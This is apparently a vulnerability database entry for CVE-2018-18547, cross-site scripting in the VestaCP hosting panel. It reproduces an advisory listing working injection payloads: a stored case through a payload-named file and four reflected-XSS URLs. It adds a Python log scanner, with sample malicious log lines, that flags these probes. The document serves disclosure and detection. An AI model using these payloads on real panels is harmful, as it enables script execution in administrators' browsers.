VestaCP Cross-Site Scripting Vulnerability

Vulnerability ID: 1362211    Vulnerability type: Cross-site scripting
Published: 2018-10-21    Updated: 2018-10-25
CVE ID: CVE-2018-18547    CNNVD-ID: CNNVD-201810-1128
Platform: N/A    CVSS score: N/A
|Vulnerability source
https://cxsecurity.com/issue/WLB-2018100179
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-201810-1128
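|Vulnerability details
VestaCP is a hosting control panel. A cross-site scripting vulnerability exists in VestaCP 0.9.8-22 and earlier versions. A remote attacker can exploit it through several methods to execute JavaScript code in a user's browser.
|Exploit (EXP)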
[+] Title: VestaCP Multiple XSS Vulnerabilities <= v0.9.8-22
[+] Author: Numan OZDEMIR (https://infinitumit.com.tr)
[+] Vendor Homepage: vestacp.com
[+] Version: Up to v0.9.8-22.
[+] CVE: CVE-2018-18547
[+] Discovered by Numan OZDEMIR in InfinitumIT Labs
[+] root@numanozdemir.com - info@infinitumit.com.tr

[~] Description:

Insert any XSS payload. I will use <img src onerror=alert(1337)>

https://IP:8083/list/directory/
-> Stored XSS:
A visitor may upload a file named as an XSS payload, using any form on your website.
If a VestaCP user sees this file in the interface, his browser will run the JavaScript.
So this vulnerability poses a high risk.

https://IP:8083/edit/web/?domain=">%3Cimg%20src%20onerror%3Dalert(1337)%3E
-> Reflected XSS

https://IP:8083/list/backup/?backup=">%3Cimg%20src%20onerror%3Dalert(1337)%3E
-> Reflected XSS

https://IP:8083/list/rrd/?period=">%3Cimg%20src%20onerror%3Dalert(1337)%3E
-> Reflected XSS

https://IP:8083/list/directory/?dir_a=">alert(1337);//
-> Reflected XSS

// for secure days...
|References

Source: packetstormsecurity.com

Link: http://packetstormsecurity.com/files/149897/VestaCP-0.9.8-22-Cross-Site-Scripting.html
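
An added detection example, not part of the original advisory or of VestaCP's code: it scans access log lines for requests to the four reflected-XSS endpoints listed above whose named parameter carries HTML markup after URL decoding. The combined log format, the sample lines and the function name `flag_requests` are assumptions constructed for illustration; the stored file-name case is not covered.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Endpoint path -> query parameter named in the advisory above.
WATCHED = {
    "/edit/web/": "domain",
    "/list/backup/": "backup",
    "/list/rrd/": "period",
    "/list/directory/": "dir_a",
}
# A domain, backup name, period or directory path should not contain these;
# they are what lets a value break out of an HTML attribute.
MARKUP = re.compile(r'[<>"]')
# Request line of a combined-format access log entry (assumed log format).
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed sample log lines (documentation IP range, not real traffic).
SAMPLE_LOG = [
    '203.0.113.5 - - [21/Oct/2018:10:00:00 +0000] "GET /list/rrd/?period=daily HTTP/1.1" 200 5120',
    '203.0.113.9 - - [21/Oct/2018:10:00:07 +0000] "GET /edit/web/?domain=%22%3E%3Cimg%20src%20onerror%3Dalert(1337)%3E HTTP/1.1" 200 9034',
    '203.0.113.9 - - [21/Oct/2018:10:00:09 +0000] "GET /list/backup/?backup=%2522%253Cimg%253E HTTP/1.1" 200 4100',
    '203.0.113.5 - - [21/Oct/2018:10:01:00 +0000] "GET /list/directory/?dir_a=/home/admin/web HTTP/1.1" 200 7000',
]


def flag_requests(lines):
    """Return (path, parameter, decoded value) for each suspicious request."""
    hits = []
    for line in lines:
        match = REQUEST.search(line)
        if not match:
            continue
        url = urlsplit(match.group(1))
        param = WATCHED.get(url.path)
        if param is None:
            continue
        for name, value in parse_qsl(url.query, keep_blank_values=True):
            # parse_qsl decodes once; decode again to see double-encoded probes.
            value = unquote(value)
            if name == param and MARKUP.search(value):
                hits.append((url.path, name, value))
    return hits


if __name__ == "__main__":
    for hit in flag_requests(SAMPLE_LOG):
        print(hit)
```

A hit shows only that markup was sent to one of these parameters; whether the response reflected it unescaped depends on the installed VestaCP version.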